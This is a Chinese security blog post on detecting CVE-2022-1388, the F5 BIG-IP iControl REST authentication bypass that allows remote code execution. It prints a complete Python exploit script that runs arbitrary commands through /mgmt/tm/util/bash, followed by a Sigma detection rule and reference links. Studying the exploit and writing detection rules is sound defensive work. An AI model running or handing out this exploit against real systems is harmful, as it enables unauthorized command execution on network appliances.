CVE-2022-1388-F5BIG-IP未授权RCE流量特征分析

最新推荐文章于 2024-05-17 14:42:20 发布
最新推荐文章于 2024-05-17 14:42:20 发布
阅读量437 收藏
点赞数
分类专栏: 安全运营 流量分析 ATT&CK 文章标签: tcp/ip bash 网络协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334464/article/details/125457477
版权

简介

此操作仅用于技术交流和学习研究使用,请勿用于非法攻击,否则造成一切后果与本人无关

在F5 BIG-IP 16.1.x 16.1.2.2之前的版本、15.1.5.1之前的15.1.x版本、14.1.4.6之前的14.1.x版本、13.1.5之前的13.1.x版本以及所有12.1.x和11.6.x版本,未公开的请求可能会绕过iControl REST身份验证。注意:未评估已达到技术支持终止(EoTS)的软件版本。

此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务。

Poc/exp

POC地址

具体POC可参考:

#!/usr/bin/python3
import argparse
import requests
import urllib3
urllib3.disable_warnings()

def exploit(target, command):
    url = f'https://{target}/mgmt/tm/util/bash'
    headers = {
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',        
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json'
           
    }
    j = {"command":"run","utilCmdArgs":"-c '{0}'".format(command)}
    r = requests.post(url, headers=headers, json=j, verify=False)
    r.raise_for_status()
    if ( r.status_code != 204 and r.headers["content-type"].strip().startswith("application/json")):
        print(r.json()['commandResult'].strip())
    else:
        print("Response is empty! Target does not seems to be vulnerable..")

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-c', '--command', help='The command to execute')
    args = parser.parse_args()

    exploit(args.target, args.command)

检测规则

title: F5-BIG-IP-RCE(CVE-2022-1388)
status: experimental
description: F5 recently patched a critical vulnerability in their BIG-IP iControl REST endpoint CVE-2022-1388. This vulnerability is particularly worrisome for users because it is simple to exploit and provides an attacker with a method to execute arbitrary system commands.
references:
    - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
    - https://www.randori.com/blog/vulnerability-analysis-cve-2022-1388/
author: 12306Br0
date: 2022/05/15
tags:
    - attack.t1190
logsource:
    category: webserver
detection:
    selection:
        cs-method: 'POST'
        c-uri|contains|all:
            - '/mgmt/tm/util/bash'
        cs-Connection: '*X-F5-Auth-Token*'
        cs-X-F5-Auth-Token: '*'
        cs-Authorization: '*'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.t1190
    - cve.2022.1388

参考推荐

CVE-2022-1388

https://github.com/horizon3ai/CVE-2022-1388

F5 BIG-IP未授权RCE(CVE-2022-1388)分析

https://www.anquanke.com/post/id/273011#h2-2

12306Br0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
F5 BIG-IP iControl REST命令执行(CVE-2022-1388)
不忘初心,护天下安全!
06-27 899
2022年5月6日,F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。漏洞存在于iControl REST组件中,该漏洞允许定义身份验证的攻击者通过 BIG-IP 管理界面和自身IP地址对 iControl REST API 接口进行网络访问,进而导致可以在目标主机上执行任意系统命令、创建或删除文件或禁用BIG-IP上的服务。组件:F5 BIG-IP iControl REST漏洞类型:身份验证绕过影响:命令执行简述:该漏洞允许经身份验证的攻击者通过管理口
漏洞CVE-2022-1388
x10n9的博客
03-10 510
CVE-2022-1388是一个影响F5 BIG-IP设备的严重漏洞12,它可以让经身份验证的攻击者绕过iControl REST认证,通过管理端口执行恶意命令。
常见流量特征
最新发布
admin的博客
05-17 885
1、特殊关键字:SQL关键字,如SELECT, WHERE, ORDER BY, UNION, UPDATE,DELETE,INSERT等,这些通常用于构建或修改查询系统函数,如USER(), @@VERSION(在MySQL中),这些可能用于获取数据库版本或当前用户等敏感信息特定数据库的函数或特性,如information_schema(用于获取数据库结构信息)、extractvalue(XML相关函数,有时用于绕过某些过滤)、floor(在盲注中用于产生条件差异)等。
[旧文系列] CVE-2020-5902: F5 BIG-IP RCE 漏洞复现与分析
mole_exp的博客
01-05 3754
文章目录关于<旧文迁移>1、前言2、搭建漏洞环境3、漏洞复现3.1 任意文件读取3.2 列出目录项3.3 RCE4、搭建漏洞调试环境5、漏洞分析5.1 坑5.2 漏洞原理Apache与Tomcat对分号 ; 的解析差异5.3 小结参考 关于<旧文迁移> <旧文迁移>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发地址:hxxps://medium.com/@m01e/cve-2020-5902-f5-big-ip-rce-漏洞分
CVE-2022-1388:F5 BIG-IP iControl REST RCE
Fly_鹏程万里
05-12 652
影响产品 F5 BIG-IP 11.6.1 - 11.6.5 F5 BIG-IP 12.1.0 - 12.1.6 F5 BIG-IP 13.1.0 - 13.1.4 F5 BIG-IP 14.1.0 - 14.1.4 F5 BIG-IP 15.1.0 - 15.1.5 F5 BIG-IP 16.1.0 - 16.1.2 漏洞影响 此漏洞可能允许经身份验证的攻击者通过管理端口和/或自身IP地址对BIG-IP系统进行网络访问,以执行任意系统命令、创建或删除文件或禁用服务 漏洞检测 检测脚本:
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
F5 BIG-IP RCE exploitation (CVE-2022-1388).md
07-09
F5 BIG-IP RCE exploitation (CVE-2022-1388)
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行.md
04-23
CVE-2021-22986 F5 BIG-IP-IQ 远程代码执行
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-1388F5 BIG-IP远程命令执行
Websec
05-13 1973
参考文章: F5 BIG-IP(CVE-2022-1388) RCE GitHub - horizon3ai/CVE-2022-1388: POC for CVE-2022-1388 1、漏洞描述 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。iControl REST 是iControl 框架的演变,使用 REpresentational State Transfer (REST)。这允许用户或脚本与 F5 设备之间进行轻量级、快速的交互
F5 BIG-IP RCE漏洞(CVE-2023-46747)来看请求走私的利用价值
C20220511的博客
11-08 1061
关于绕过权限之后F5 BIG-IP执行命令的逻辑在F5历史漏洞CVE-2022-1388中已经使用过,其实F5 BIG-IP本身就提供了接口/mgmt/tm/util/bash为后台用户执行系统命令的,有兴趣的读者也可以看https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg了解详细的创建用户和后台命令执行的逻辑。从图2.3可以看出,整个AJP请求走私的流程是可以把一个HTTP请求经过AJP代理转化之后转化为两个AJP请求,这也是请求走私名字的来源。
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞_f5 big-ip icontrol rest身份验证绕过漏洞
uftdv17136的博客
04-17 312
BIG-IPF5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。在bash中执行的简单脚本,用于CVE-2022-1388 (F5)的多主机检查。该漏洞CVSS评分:9.8。
自学黑客(网络安全),一般人我劝你还是算了吧
顶峰
09-22 166
网络安全自学路线
CVE-2022-1388——F5 BIG-IP iControl REST 身份认证绕过漏洞
LiBai'S BLOG
05-06 7320
漏洞描述 BIG-IPF5 公司的一款应用交付服务是面向以应用为中心的世界先进技术。借助 BIG-IP 应用程序交付控制器保持应用程序正常运行。BIG-IP 本地流量管理器 (LTM) 和 BIG-IP DNS 能够处理应用程序流量并保护基础设施。 CVE-2022-1388 经身份验证的攻击者可以通过管理端口或自身 IP 地址对 BIG-IP 系统进行网络访问,执行任意系统命令、创建或删除文件或禁用服务。 漏洞危害 该漏洞CVSS评分:9.8 危害等级:严重 影响范围 11.6.1 - 11..
CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
weixin_50464560的博客
05-10 2030
转载至CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现-网盾安全学院 (315safe.com) 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-1388,影响版本如下: 环境搭建 下载v15.x系列: 首次运行需要修改
CVE-2022-1388 F5 BIG-IP权限绕过命令执行漏洞复现
热爱学习,喜欢折腾!
09-02 2103
F5Networks(纳斯达克: FFIV),全球领先的应用交付网络(ADN)领域的厂商,创建于1996年,总部位于美国西雅图市,F5为全球大型企业、运营商、政府与消费品牌提供更加快速、安全以及智能的应用,通过交付云与安全解决方案,F5帮助企业在不损失速度与管理性的同时享有它们所需的应用架构。F5官网发布安全公告,披露F5 BIG-IP存在一处远程代码执行漏洞(CVE-2022-1388)。
F5 CVE-2022-1388 CVE-2021-22986测试
weixin_44184011的博客
08-14 503
又到了护网的时候,客户开始关注安全问题,来跟我咨询两个F5CVECVE-2022-1388 CVE-2021-22986。在给客户提供了解决方案之后,由于这两个CVE时间都比较长(一个是2021年一个是2022年的),所以做了个简单的POC。两个CVE都是基于F5的RESTAPI进行利用,可绕过身份验证,远程执行命令。可通过升级的方式修复,如果暂时不方便升级,可以根据官方指示进行缓解。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值